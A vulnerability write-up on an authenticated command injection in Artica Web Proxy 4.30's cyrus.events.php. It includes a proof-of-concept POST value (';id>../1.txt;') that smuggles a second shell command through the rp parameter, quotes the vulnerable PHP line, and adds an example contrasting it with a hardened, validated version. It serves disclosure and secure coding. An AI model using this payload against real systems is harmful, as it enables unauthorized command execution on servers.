Artica Proxy 4.30 cyrus.events.php RCE

rootless
Sep 26, 2021

--

Vendor && Product

www.articatech.com

Artica Web Proxy v4.30.000000

Download: http://www.articatech.com/download.php

Reproduction

Log in to the web account and use this PoC.

Because the execution result is not echoed back in the response, we view the result by writing it to a file.

https://192.168.108.14:9000/cyrus.events.php?logs=

POST:
rp=;id>../1.txt;

Accessing https://192.168.108.14:9000/1.txt, we can see the execution result.

OS Command Injection Analysis

The vulnerable file is cyrus.events.php. It receives a parameter logs and executes the function logs().

In the function logs(), it receives another parameter rp via POST, then passes both to the file cyrus.php with ?cyrus-events=yes.

In cyrus.php, cyrus-events corresponds to cyrus_events(), which builds a shell command from these values without sanitizing them, so a ; in rp terminates the intended command and starts an attacker-supplied one:

$cmdline="$grep --binary-files=text -Ei \"$search\" /var/log/mail.log|$tail -n $rp  >$logfile 2>&1";
...
shell_exec($cmdline);
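To make the root cause concrete, here is the same command-building pattern beside a hardened version. This is an added example written for this write-up, not code from Artica; the variable names $grep, $tail, $logfile and $search are taken from the fragment above, their values here are placeholders, and the function names are invented for the demonstration.

```php
<?php
// Added example, not Artica's code. Mirrors the shape of cyrus_events() shown above.
// $grep, $tail, $logfile are placeholder values standing in for whatever cyrus.php sets.
$cfg = [
    'grep'    => '/bin/grep',
    'tail'    => '/usr/bin/tail',
    'logfile' => '/tmp/cyrus-events.log',   // placeholder path
];

// Vulnerable shape (as described on the page): $search and $rp come straight from the
// request and are interpolated into a shell string. A ';' in $rp ends the tail
// invocation and the rest of the value runs as a separate command under shell_exec().
function build_vulnerable(array $cfg, string $search, string $rp): string {
    return "{$cfg['grep']} --binary-files=text -Ei \"$search\" /var/log/mail.log|{$cfg['tail']} -n $rp  >{$cfg['logfile']} 2>&1";
}

// Hardened shape: $rp is only ever a line count, so it is validated as a bounded
// positive integer and rejected otherwise; $search is wrapped with escapeshellarg()
// so it is passed to grep as one argument; the redirection target stays server-side.
function build_hardened(array $cfg, string $search, string $rp): ?string {
    if (!ctype_digit($rp)) {
        return null;                       // not a line count at all (e.g. ';id>../1.txt;')
    }
    $lines = (int) $rp;
    if ($lines < 1 || $lines > 10000) {
        return null;                       // keep the value in a sane range
    }
    $pattern = escapeshellarg($search);
    $log     = escapeshellarg($cfg['logfile']);
    return "{$cfg['grep']} --binary-files=text -Ei $pattern /var/log/mail.log | {$cfg['tail']} -n $lines >$log 2>&1";
}

// Constructed sample inputs: a normal request and the payload shape from the PoC above.
$normal  = '50';
$payload = ';id>../1.txt;';

echo "vulnerable, normal : ", build_vulnerable($cfg, 'error', $normal),  "\n";
echo "vulnerable, payload: ", build_vulnerable($cfg, 'error', $payload), "\n";  // second command present
echo "hardened,   normal : ", build_hardened($cfg, 'error', $normal),    "\n";
var_dump(build_hardened($cfg, 'error', $payload));                             // NULL: rejected before any shell is involved
```

Running it shows the injected value surviving intact in the vulnerable string and being rejected (NULL) by the hardened builder. Escaping alone is a minimum; a stronger fix is to avoid the shell entirely, for example by passing grep and tail their arguments as an array via proc_open() and doing the redirection in PHP, so no user-controlled byte is ever parsed as shell syntax.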
